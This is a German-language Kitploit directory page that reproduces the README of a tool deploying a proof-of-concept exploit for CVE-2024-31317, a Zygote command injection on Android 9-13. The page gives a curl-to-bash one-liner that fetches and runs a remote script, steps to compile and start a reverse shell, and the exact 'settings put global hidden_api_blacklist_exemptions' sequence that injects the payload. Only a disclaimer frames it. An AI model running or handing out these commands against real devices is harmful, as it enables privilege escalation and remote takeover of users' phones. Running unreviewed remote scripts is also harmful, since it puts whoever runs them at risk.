Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-31317-PoC-Deployer — Automatisiertes Deployment-Tool für den CVE-2024-31317-PoC auf Android 9-13, das eine Privilegieneskalation durch Zygote-Injektion und Reverse-Shell-Ausführung ermöglicht. | Kitploit
Tools/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Android-SicherheitPrivilege EscalationExploitationShellcodePenetrationstestsMobile SicherheitPayload-EntwicklungBinary-Exploitation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Automatisiertes Deployment-Tool für den CVE-2024-31317-PoC auf Android 9-13, das eine Privilegieneskalation durch Zygote-Injektion und Reverse-Shell-Ausführung ermöglicht.

Repository anzeigen
52867vor 1 JahrVon Kitploit geprüft

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Ein Bereitstellungstool für den Proof-of-Concept-Exploit CVE-2024-31317, der auf Android-Geräte von Version 9 bis 13 abzielt.

📝 Projektbeschreibung

CVE-2024-31317-PoC-Deployer ist ein automatisiertes Bereitstellungsskript, das schnell alle für die Ausnutzung von CVE-2024-31317 erforderlichen Dateien generiert und konfiguriert. Die Schwachstelle betrifft Android-Geräte der Versionen 9 bis 13 und ermöglicht eine Rechteausweitung und Ausführung beliebigen Codes über den Zygote-Prozess.

🚨 Schwachstelleninformationen

  • CVE-ID: CVE-2024-31317
  • Betroffene Versionen: Android 9 bis Android 13
  • Behobene Versionen: Android-Versionen mit dem Patch-Level vom Juni 2024 und höher
  • Schwachstellentyp: Befehlsinjektion im Zygote-Prozess
  • Erforderliche Berechtigung: WRITE_SECURE_SETTINGS

📦 Enthaltene Dateien

  • reverse_shell.c – Reverse-Shell-Programm in C
  • payload.txt – Speziell konstruiertes Exploit-Payload
  • compile.sh – Automatisches Kompilierungsskript
  • README.txt – Detaillierte Benutzungsanleitung
  • CVE-2024-31317.txt – Technische Analyse der Schwachstelle

🛠️ Schnellstart

  1. Führen Sie das Bereitstellungsskript aus:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. Reverse-Shell kompilieren:

    root@kitploit:~
    sh compile.sh
    
  3. Reverse-Shell-Listener starten:

    root@kitploit:~
    sh reverse_shell
    

💣 Exploit-Schritte

  1. Laden Sie payload.txt auf das Zielgerät unter /data/local/tmp/ hoch.
  2. Ersetzen Sie xxx.xxx.xxx in payload.txt durch die IP-Adresse Ihres Listener-Servers.
  3. Führen Sie auf dem Zielgerät die folgende Befehlssequenz aus:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich zu legitimen Sicherheitstest- und Forschungszwecken. Vor der Verwendung muss eine ausdrückliche Genehmigung des Zielsystems eingeholt werden. Eine unbefugte Nutzung kann gegen geltendes Recht verstoßen. Der Entwickler übernimmt keine Verantwortung für Missbrauch.

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

📚 Technische Referenzen

  • Android Security Bulletin – Juni 2024
  • CVE-2024-31317 Details
Tool herunterladen